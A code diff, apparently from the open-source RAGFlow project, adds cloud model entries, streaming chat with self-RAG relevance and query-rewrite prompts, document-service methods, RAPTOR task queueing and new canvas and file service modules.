"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mistral-small-2402-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-embed-text-v2:0",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.embed-english-v3",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.embed-multilingual-v3",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
]
|
||||
for info in factory_infos:
|
||||
try:
|
||||
@ -347,7 +915,28 @@ def init_llm_factory():
|
||||
LLMService.filter_delete([LLM.fid == "Local"])
|
||||
LLMService.filter_delete([LLM.fid == "Moonshot", LLM.llm_name == "flag-embedding"])
|
||||
TenantLLMService.filter_delete([TenantLLM.llm_factory == "Moonshot", TenantLLM.llm_name == "flag-embedding"])
|
||||
|
||||
LLMFactoriesService.filter_delete([LLMFactoriesService.model.name == "QAnything"])
|
||||
LLMService.filter_delete([LLMService.model.fid == "QAnything"])
|
||||
TenantLLMService.filter_update([TenantLLMService.model.llm_factory == "QAnything"], {"llm_factory": "Youdao"})
|
||||
## insert openai two embedding models to the current openai user.
|
||||
print("Start to insert 2 OpenAI embedding models...")
|
||||
tenant_ids = set([row["tenant_id"] for row in TenantLLMService.get_openai_models()])
|
||||
for tid in tenant_ids:
|
||||
for row in TenantLLMService.query(llm_factory="OpenAI", tenant_id=tid):
|
||||
row = row.to_dict()
|
||||
row["model_type"] = LLMType.EMBEDDING.value
|
||||
row["llm_name"] = "text-embedding-3-small"
|
||||
row["used_tokens"] = 0
|
||||
try:
|
||||
TenantLLMService.save(**row)
|
||||
row = deepcopy(row)
|
||||
row["llm_name"] = "text-embedding-3-large"
|
||||
TenantLLMService.save(**row)
|
||||
except Exception as e:
|
||||
pass
|
||||
break
|
||||
for kb_id in KnowledgebaseService.get_all_ids():
|
||||
KnowledgebaseService.update_by_id(kb_id, {"doc_num": DocumentService.get_kb_doc_count(kb_id)})
|
||||
"""
|
||||
drop table llm;
|
||||
drop table llm_factories;
|
||||
@ -358,6 +947,20 @@ def init_llm_factory():
|
||||
"""
|
||||
|
||||
|
||||
def add_graph_templates():
|
||||
dir = os.path.join(get_project_base_directory(), "graph", "templates")
|
||||
for fnm in os.listdir(dir):
|
||||
try:
|
||||
cnvs = json.load(open(os.path.join(dir, fnm), "r"))
|
||||
try:
|
||||
CanvasTemplateService.save(**cnvs)
|
||||
except:
|
||||
CanvasTemplateService.update_by_id(cnvs["id"], cnvs)
|
||||
except Exception as e:
|
||||
print("Add graph templates error: ", e)
|
||||
print("------------", flush=True)
|
||||
|
||||
|
||||
def init_web_data():
|
||||
start_time = time.time()
|
||||
|
||||
@ -365,6 +968,7 @@ def init_web_data():
|
||||
if not UserService.get_all().count():
|
||||
init_superuser()
|
||||
|
||||
add_graph_templates()
|
||||
print("init web data success:{}".format(time.time() - start_time))
|
||||
|
||||
|
||||
|
||||
@ -40,8 +40,8 @@ class API4ConversationService(CommonService):
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def append_message(cls, id, conversation):
|
||||
cls.model.update_by_id(id, conversation)
|
||||
return cls.model.update(round=cls.model.round + 1).where(id=id).execute()
|
||||
cls.update_by_id(id, conversation)
|
||||
return cls.model.update(round=cls.model.round + 1).where(cls.model.id==id).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
|
||||
26
api/db/services/canvas_service.py
Normal file
26
api/db/services/canvas_service.py
Normal file
@ -0,0 +1,26 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
import peewee
|
||||
from api.db.db_models import DB, API4Conversation, APIToken, Dialog, CanvasTemplate, UserCanvas
|
||||
from api.db.services.common_service import CommonService
|
||||
|
||||
|
||||
class CanvasTemplateService(CommonService):
|
||||
model = CanvasTemplate
|
||||
|
||||
class UserCanvasService(CommonService):
|
||||
model = UserCanvas
|
||||
@ -14,6 +14,7 @@
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
from copy import deepcopy
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.db_models import Dialog, Conversation
|
||||
@ -22,6 +23,7 @@ from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
|
||||
from api.settings import chat_logger, retrievaler
|
||||
from rag.app.resume import forbidden_select_fields4resume
|
||||
from rag.nlp import keyword_extraction
|
||||
from rag.nlp.search import index_name
|
||||
from rag.utils import rmSpace, num_tokens_from_string, encoder
|
||||
|
||||
@ -57,21 +59,21 @@ def message_fit_in(msg, max_length=4000):
|
||||
if c < max_length:
|
||||
return c, msg
|
||||
|
||||
ll = num_tokens_from_string(msg_[0].content)
|
||||
l = num_tokens_from_string(msg_[-1].content)
|
||||
ll = num_tokens_from_string(msg_[0]["content"])
|
||||
l = num_tokens_from_string(msg_[-1]["content"])
|
||||
if ll / (ll + l) > 0.8:
|
||||
m = msg_[0].content
|
||||
m = msg_[0]["content"]
|
||||
m = encoder.decode(encoder.encode(m)[:max_length - l])
|
||||
msg[0].content = m
|
||||
msg[0]["content"] = m
|
||||
return max_length, msg
|
||||
|
||||
m = msg_[1].content
|
||||
m = msg_[1]["content"]
|
||||
m = encoder.decode(encoder.encode(m)[:max_length - l])
|
||||
msg[1].content = m
|
||||
msg[1]["content"] = m
|
||||
return max_length, msg
|
||||
|
||||
|
||||
def chat(dialog, messages, **kwargs):
|
||||
def chat(dialog, messages, stream=True, **kwargs):
|
||||
assert messages[-1]["role"] == "user", "The last content of this conversation is not from user."
|
||||
llm = LLMService.query(llm_name=dialog.llm_id)
|
||||
if not llm:
|
||||
@ -79,10 +81,13 @@ def chat(dialog, messages, **kwargs):
|
||||
if not llm:
|
||||
raise LookupError("LLM(%s) not found" % dialog.llm_id)
|
||||
max_tokens = 1024
|
||||
else: max_tokens = llm[0].max_tokens
|
||||
else:
|
||||
max_tokens = llm[0].max_tokens
|
||||
kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
|
||||
if len(embd_nms) != 1:
|
||||
yield {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
|
||||
return {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
|
||||
|
||||
questions = [m["content"] for m in messages if m["role"] == "user"]
|
||||
embd_mdl = LLMBundle(dialog.tenant_id, LLMType.EMBEDDING, embd_nms[0])
|
||||
@ -94,7 +99,9 @@ def chat(dialog, messages, **kwargs):
|
||||
if field_map:
|
||||
chat_logger.info("Use SQL to retrieval:{}".format(questions[-1]))
|
||||
ans = use_sql(questions[-1], field_map, dialog.tenant_id, chat_mdl, prompt_config.get("quote", True))
|
||||
if ans: return ans
|
||||
if ans:
|
||||
yield ans
|
||||
return
|
||||
|
||||
for p in prompt_config["parameters"]:
|
||||
if p["key"] == "knowledge":
|
||||
@ -105,38 +112,57 @@ def chat(dialog, messages, **kwargs):
|
||||
prompt_config["system"] = prompt_config["system"].replace(
|
||||
"{%s}" % p["key"], " ")
|
||||
|
||||
rerank_mdl = None
|
||||
if dialog.rerank_id:
|
||||
rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)
|
||||
|
||||
for _ in range(len(questions) // 2):
|
||||
questions.append(questions[-1])
|
||||
if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
|
||||
kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
|
||||
else:
|
||||
if prompt_config.get("keyword", False):
|
||||
questions[-1] += keyword_extraction(chat_mdl, questions[-1])
|
||||
kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
|
||||
dialog.similarity_threshold,
|
||||
dialog.vector_similarity_weight, top=1024, aggs=False)
|
||||
dialog.vector_similarity_weight,
|
||||
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
|
||||
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
|
||||
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
|
||||
#self-rag
|
||||
if dialog.prompt_config.get("self_rag") and not relevant(dialog.tenant_id, dialog.llm_id, questions[-1], knowledges):
|
||||
questions[-1] = rewrite(dialog.tenant_id, dialog.llm_id, questions[-1])
|
||||
kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
|
||||
dialog.similarity_threshold,
|
||||
dialog.vector_similarity_weight,
|
||||
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
|
||||
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
|
||||
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
|
||||
|
||||
chat_logger.info(
|
||||
"{}->{}".format(" ".join(questions), "\n->".join(knowledges)))
|
||||
|
||||
if not knowledges and prompt_config.get("empty_response"):
|
||||
return {
|
||||
"answer": prompt_config["empty_response"], "reference": kbinfos}
|
||||
yield {"answer": prompt_config["empty_response"], "reference": kbinfos}
|
||||
return {"answer": prompt_config["empty_response"], "reference": kbinfos}
|
||||
|
||||
kwargs["knowledge"] = "\n".join(knowledges)
|
||||
gen_conf = dialog.llm_setting
|
||||
msg = [{"role": m["role"], "content": m["content"]}
|
||||
for m in messages if m["role"] != "system"]
|
||||
|
||||
msg = [{"role": "system", "content": prompt_config["system"].format(**kwargs)}]
|
||||
msg.extend([{"role": m["role"], "content": m["content"]}
|
||||
for m in messages if m["role"] != "system"])
|
||||
used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
|
||||
assert len(msg) >= 2, f"message_fit_in has bug: {msg}"
|
||||
|
||||
if "max_tokens" in gen_conf:
|
||||
gen_conf["max_tokens"] = min(
|
||||
gen_conf["max_tokens"],
|
||||
max_tokens - used_token_count)
|
||||
answer = chat_mdl.chat(
|
||||
prompt_config["system"].format(
|
||||
**kwargs), msg, gen_conf)
|
||||
chat_logger.info("User: {}|Assistant: {}".format(
|
||||
msg[-1]["content"], answer))
|
||||
|
||||
if knowledges and prompt_config.get("quote", True):
|
||||
def decorate_answer(answer):
|
||||
nonlocal prompt_config, knowledges, kwargs, kbinfos
|
||||
if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
|
||||
answer, idx = retrievaler.insert_citations(answer,
|
||||
[ck["content_ltks"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
@ -151,12 +177,26 @@ def chat(dialog, messages, **kwargs):
|
||||
if not recall_docs: recall_docs = kbinfos["doc_aggs"]
|
||||
kbinfos["doc_aggs"] = recall_docs
|
||||
|
||||
for c in kbinfos["chunks"]:
|
||||
refs = deepcopy(kbinfos)
|
||||
for c in refs["chunks"]:
|
||||
if c.get("vector"):
|
||||
del c["vector"]
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api")>=0:
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
|
||||
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
|
||||
return {"answer": answer, "reference": kbinfos}
|
||||
return {"answer": answer, "reference": refs}
|
||||
|
||||
if stream:
|
||||
answer = ""
|
||||
for ans in chat_mdl.chat_streamly(msg[0]["content"], msg[1:], gen_conf):
|
||||
answer = ans
|
||||
yield {"answer": answer, "reference": {}}
|
||||
yield decorate_answer(answer)
|
||||
else:
|
||||
answer = chat_mdl.chat(
|
||||
msg[0]["content"], msg[1:], gen_conf)
|
||||
chat_logger.info("User: {}|Assistant: {}".format(
|
||||
msg[-1]["content"], answer))
|
||||
yield decorate_answer(answer)
|
||||
|
||||
|
||||
def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
@ -248,7 +288,8 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
|
||||
# compose markdown table
|
||||
clmns = "|" + "|".join([re.sub(r"(/.*|([^()]+))", "", field_map.get(tbl["columns"][i]["name"],
|
||||
tbl["columns"][i]["name"])) for i in clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
|
||||
tbl["columns"][i]["name"])) for i in
|
||||
clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
|
||||
|
||||
line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
|
||||
("|------|" if docid_idx and docid_idx else "")
|
||||
@ -258,7 +299,8 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
"|" for r in tbl["rows"]]
|
||||
if quota:
|
||||
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
else: rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
else:
|
||||
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)
|
||||
|
||||
if not docid_idx or not docnm_idx:
|
||||
@ -278,5 +320,40 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
return {
|
||||
"answer": "\n".join([clmns, line, rows]),
|
||||
"reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
|
||||
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in doc_aggs.items()]}
|
||||
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in
|
||||
doc_aggs.items()]}
|
||||
}
|
||||
|
||||
|
||||
def relevant(tenant_id, llm_id, question, contents: list):
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
|
||||
prompt = """
|
||||
You are a grader assessing relevance of a retrieved document to a user question.
|
||||
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
|
||||
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
|
||||
Give a binary score 'yes' or 'no' score to indicate whether the document is relevant to the question.
|
||||
No other words needed except 'yes' or 'no'.
|
||||
"""
|
||||
if not contents:return False
|
||||
contents = "Documents: \n" + " - ".join(contents)
|
||||
contents = f"Question: {question}\n" + contents
|
||||
if num_tokens_from_string(contents) >= chat_mdl.max_length - 4:
|
||||
contents = encoder.decode(encoder.encode(contents)[:chat_mdl.max_length - 4])
|
||||
ans = chat_mdl.chat(prompt, [{"role": "user", "content": contents}], {"temperature": 0.01})
|
||||
if ans.lower().find("yes") >= 0: return True
|
||||
return False
|
||||
|
||||
|
||||
def rewrite(tenant_id, llm_id, question):
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
|
||||
prompt = """
|
||||
You are an expert at query expansion to generate a paraphrasing of a question.
|
||||
I can't retrieval relevant information from the knowledge base by using user's question directly.
|
||||
You need to expand or paraphrase user's question by multiple ways such as using synonyms words/phrase,
|
||||
writing the abbreviation in its entirety, adding some extra descriptions or explanations,
|
||||
changing the way of expression, translating the original question into another language (English/Chinese), etc.
|
||||
And return 5 versions of question and one is from translation.
|
||||
Just list the question. No other words are needed.
|
||||
"""
|
||||
ans = chat_mdl.chat(prompt, [{"role": "user", "content": question}], {"temperature": 0.8})
|
||||
return ans
|
||||
|
||||
@ -13,14 +13,26 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from peewee import Expression
|
||||
import random
|
||||
from datetime import datetime
|
||||
from elasticsearch_dsl import Q
|
||||
from peewee import fn
|
||||
|
||||
from api.db.db_utils import bulk_insert_into_db
|
||||
from api.settings import stat_logger
|
||||
from api.utils import current_timestamp, get_format_time, get_uuid
|
||||
from rag.settings import SVR_QUEUE_NAME
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils.minio_conn import MINIO
|
||||
from rag.nlp import search
|
||||
|
||||
from api.db import FileType, TaskStatus
|
||||
from api.db.db_models import DB, Knowledgebase, Tenant
|
||||
from api.db.db_models import DB, Knowledgebase, Tenant, Task
|
||||
from api.db.db_models import Document
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db import StatusEnum
|
||||
from rag.utils.redis_conn import REDIS_CONN
|
||||
|
||||
|
||||
class DocumentService(CommonService):
|
||||
@ -32,8 +44,9 @@ class DocumentService(CommonService):
|
||||
orderby, desc, keywords):
|
||||
if keywords:
|
||||
docs = cls.model.select().where(
|
||||
cls.model.kb_id == kb_id,
|
||||
cls.model.name.like(f"%%{keywords}%%"))
|
||||
(cls.model.kb_id == kb_id),
|
||||
(fn.LOWER(cls.model.name).contains(keywords.lower()))
|
||||
)
|
||||
else:
|
||||
docs = cls.model.select().where(cls.model.kb_id == kb_id)
|
||||
count = docs.count()
|
||||
@ -46,6 +59,35 @@ class DocumentService(CommonService):
|
||||
|
||||
return list(docs.dicts()), count
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def list_documents_in_dataset(cls, dataset_id, offset, count, order_by, descend, keywords):
|
||||
if keywords:
|
||||
docs = cls.model.select().where(
|
||||
(cls.model.kb_id == dataset_id),
|
||||
(fn.LOWER(cls.model.name).contains(keywords.lower()))
|
||||
)
|
||||
else:
|
||||
docs = cls.model.select().where(cls.model.kb_id == dataset_id)
|
||||
|
||||
total = docs.count()
|
||||
|
||||
if descend == 'True':
|
||||
docs = docs.order_by(cls.model.getter_by(order_by).desc())
|
||||
if descend == 'False':
|
||||
docs = docs.order_by(cls.model.getter_by(order_by).asc())
|
||||
|
||||
docs = list(docs.dicts())
|
||||
docs_length = len(docs)
|
||||
|
||||
if offset < 0 or offset > docs_length:
|
||||
raise IndexError("Offset is out of the valid range.")
|
||||
|
||||
if count == -1:
|
||||
return docs[offset:], total
|
||||
|
||||
return docs[offset:offset + count], total
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert(cls, doc):
|
||||
@ -62,16 +104,15 @@ class DocumentService(CommonService):
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete(cls, doc):
|
||||
e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
|
||||
if not KnowledgebaseService.update_by_id(
|
||||
kb.id, {"doc_num": kb.doc_num - 1}):
|
||||
raise RuntimeError("Database error (Knowledgebase)!")
|
||||
def remove_document(cls, doc, tenant_id):
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
|
||||
cls.clear_chunk_num(doc.id)
|
||||
return cls.delete_by_id(doc.id)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_newly_uploaded(cls, tm, mod=0, comm=1, items_per_page=64):
|
||||
def get_newly_uploaded(cls):
|
||||
fields = [
|
||||
cls.model.id,
|
||||
cls.model.kb_id,
|
||||
@ -93,17 +134,15 @@ class DocumentService(CommonService):
|
||||
cls.model.status == StatusEnum.VALID.value,
|
||||
~(cls.model.type == FileType.VIRTUAL.value),
|
||||
cls.model.progress == 0,
|
||||
cls.model.update_time >= tm,
|
||||
cls.model.run == TaskStatus.RUNNING.value,
|
||||
(Expression(cls.model.create_time, "%%", comm) == mod))\
|
||||
.order_by(cls.model.update_time.asc())\
|
||||
.paginate(1, items_per_page)
|
||||
cls.model.update_time >= current_timestamp() - 1000 * 600,
|
||||
cls.model.run == TaskStatus.RUNNING.value)\
|
||||
.order_by(cls.model.update_time.asc())
|
||||
return list(docs.dicts())
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_unfinished_docs(cls):
|
||||
fields = [cls.model.id, cls.model.process_begin_at]
|
||||
fields = [cls.model.id, cls.model.process_begin_at, cls.model.parser_config, cls.model.progress_msg]
|
||||
docs = cls.model.select(*fields) \
|
||||
.where(
|
||||
cls.model.status == StatusEnum.VALID.value,
|
||||
@ -130,6 +169,22 @@ class DocumentService(CommonService):
|
||||
Knowledgebase.id == kb_id).execute()
|
||||
return num
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def clear_chunk_num(cls, doc_id):
|
||||
doc = cls.model.get_by_id(doc_id)
|
||||
assert doc, "Can't fine document in database."
|
||||
|
||||
num = Knowledgebase.update(
|
||||
token_num=Knowledgebase.token_num -
|
||||
doc.token_num,
|
||||
chunk_num=Knowledgebase.chunk_num -
|
||||
doc.chunk_num,
|
||||
doc_num=Knowledgebase.doc_num-1
|
||||
).where(
|
||||
Knowledgebase.id == doc.kb_id).execute()
|
||||
return num
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_tenant_id(cls, doc_id):
|
||||
@ -143,6 +198,43 @@ class DocumentService(CommonService):
|
||||
return
|
||||
return docs[0]["tenant_id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_tenant_id_by_name(cls, name):
|
||||
docs = cls.model.select(
|
||||
Knowledgebase.tenant_id).join(
|
||||
Knowledgebase, on=(
|
||||
Knowledgebase.id == cls.model.kb_id)).where(
|
||||
cls.model.name == name, Knowledgebase.status == StatusEnum.VALID.value)
|
||||
docs = docs.dicts()
|
||||
if not docs:
|
||||
return
|
||||
return docs[0]["tenant_id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_embd_id(cls, doc_id):
|
||||
docs = cls.model.select(
|
||||
Knowledgebase.embd_id).join(
|
||||
Knowledgebase, on=(
|
||||
Knowledgebase.id == cls.model.kb_id)).where(
|
||||
cls.model.id == doc_id, Knowledgebase.status == StatusEnum.VALID.value)
|
||||
docs = docs.dicts()
|
||||
if not docs:
|
||||
return
|
||||
return docs[0]["embd_id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_doc_id_by_doc_name(cls, doc_name):
|
||||
fields = [cls.model.id]
|
||||
doc_id = cls.model.select(*fields) \
|
||||
.where(cls.model.name == doc_name)
|
||||
doc_id = doc_id.dicts()
|
||||
if not doc_id:
|
||||
return
|
||||
return doc_id[0]["id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_thumbnails(cls, docids):
|
||||
@ -177,3 +269,82 @@ class DocumentService(CommonService):
|
||||
on=(Knowledgebase.id == cls.model.kb_id)).where(
|
||||
Knowledgebase.tenant_id == tenant_id)
|
||||
return len(docs)
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def begin2parse(cls, docid):
|
||||
cls.update_by_id(
|
||||
docid, {"progress": random.random() * 1 / 100.,
|
||||
"progress_msg": "Task dispatched...",
|
||||
"process_begin_at": get_format_time()
|
||||
})
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_progress(cls):
|
||||
docs = cls.get_unfinished_docs()
|
||||
for d in docs:
|
||||
try:
|
||||
tsks = Task.query(doc_id=d["id"], order_by=Task.create_time)
|
||||
if not tsks:
|
||||
continue
|
||||
msg = []
|
||||
prg = 0
|
||||
finished = True
|
||||
bad = 0
|
||||
status = TaskStatus.RUNNING.value
|
||||
for t in tsks:
|
||||
if 0 <= t.progress < 1:
|
||||
finished = False
|
||||
prg += t.progress if t.progress >= 0 else 0
|
||||
msg.append(t.progress_msg)
|
||||
if t.progress == -1:
|
||||
bad += 1
|
||||
prg /= len(tsks)
|
||||
if finished and bad:
|
||||
prg = -1
|
||||
status = TaskStatus.FAIL.value
|
||||
elif finished:
|
||||
if d["parser_config"].get("raptor", {}).get("use_raptor") and d["progress_msg"].lower().find(" raptor")<0:
|
||||
queue_raptor_tasks(d)
|
||||
prg *= 0.98
|
||||
msg.append("------ RAPTOR -------")
|
||||
else:
|
||||
status = TaskStatus.DONE.value
|
||||
|
||||
msg = "\n".join(msg)
|
||||
info = {
|
||||
"process_duation": datetime.timestamp(
|
||||
datetime.now()) -
|
||||
d["process_begin_at"].timestamp(),
|
||||
"run": status}
|
||||
if prg != 0:
|
||||
info["progress"] = prg
|
||||
if msg:
|
||||
info["progress_msg"] = msg
|
||||
cls.update_by_id(d["id"], info)
|
||||
except Exception as e:
|
||||
stat_logger.error("fetch task exception:" + str(e))
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_kb_doc_count(cls, kb_id):
|
||||
return len(cls.model.select(cls.model.id).where(
|
||||
cls.model.kb_id == kb_id).dicts())
|
||||
|
||||
|
||||
def queue_raptor_tasks(doc):
|
||||
def new_task():
|
||||
nonlocal doc
|
||||
return {
|
||||
"id": get_uuid(),
|
||||
"doc_id": doc["id"],
|
||||
"from_page": 0,
|
||||
"to_page": -1,
|
||||
"progress_msg": "Start to do RAPTOR (Recursive Abstractive Processing For Tree-Organized Retrieval)."
|
||||
}
|
||||
|
||||
task = new_task()
|
||||
bulk_insert_into_db(Task, [task], True)
|
||||
task["type"] = "raptor"
|
||||
assert REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=task), "Can't access Redis. Please check the Redis' status."
|
||||
85
api/db/services/file2document_service.py
Normal file
85
api/db/services/file2document_service.py
Normal file
@ -0,0 +1,85 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
|
||||
from api.db import FileSource
|
||||
from api.db.db_models import DB
|
||||
from api.db.db_models import File, File2Document
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.utils import current_timestamp, datetime_format, get_uuid
|
||||
|
||||
|
||||
class File2DocumentService(CommonService):
|
||||
model = File2Document
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_file_id(cls, file_id):
|
||||
objs = cls.model.select().where(cls.model.file_id == file_id)
|
||||
return objs
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_document_id(cls, document_id):
|
||||
objs = cls.model.select().where(cls.model.document_id == document_id)
|
||||
return objs
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert(cls, obj):
|
||||
if not cls.save(**obj):
|
||||
raise RuntimeError("Database error (File)!")
|
||||
e, obj = cls.get_by_id(obj["id"])
|
||||
if not e:
|
||||
raise RuntimeError("Database error (File retrieval)!")
|
||||
return obj
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete_by_file_id(cls, file_id):
|
||||
return cls.model.delete().where(cls.model.file_id == file_id).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def delete_by_document_id(cls, doc_id):
|
||||
return cls.model.delete().where(cls.model.document_id == doc_id).execute()
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_by_file_id(cls, file_id, obj):
|
||||
obj["update_time"] = current_timestamp()
|
||||
obj["update_date"] = datetime_format(datetime.now())
|
||||
num = cls.model.update(obj).where(cls.model.id == file_id).execute()
|
||||
e, obj = cls.get_by_id(cls.model.id)
|
||||
return obj
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_minio_address(cls, doc_id=None, file_id=None):
|
||||
if doc_id:
|
||||
f2d = cls.get_by_document_id(doc_id)
|
||||
else:
|
||||
f2d = cls.get_by_file_id(file_id)
|
||||
if f2d:
|
||||
file = File.get_by_id(f2d[0].file_id)
|
||||
if file.source_type == FileSource.LOCAL:
|
||||
return file.parent_id, file.location
|
||||
doc_id = f2d[0].document_id
|
||||
|
||||
assert doc_id, "please specify doc_id"
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
return doc.kb_id, doc.location
|
||||
315
api/db/services/file_service.py
Normal file
315
api/db/services/file_service.py
Normal file
@ -0,0 +1,315 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
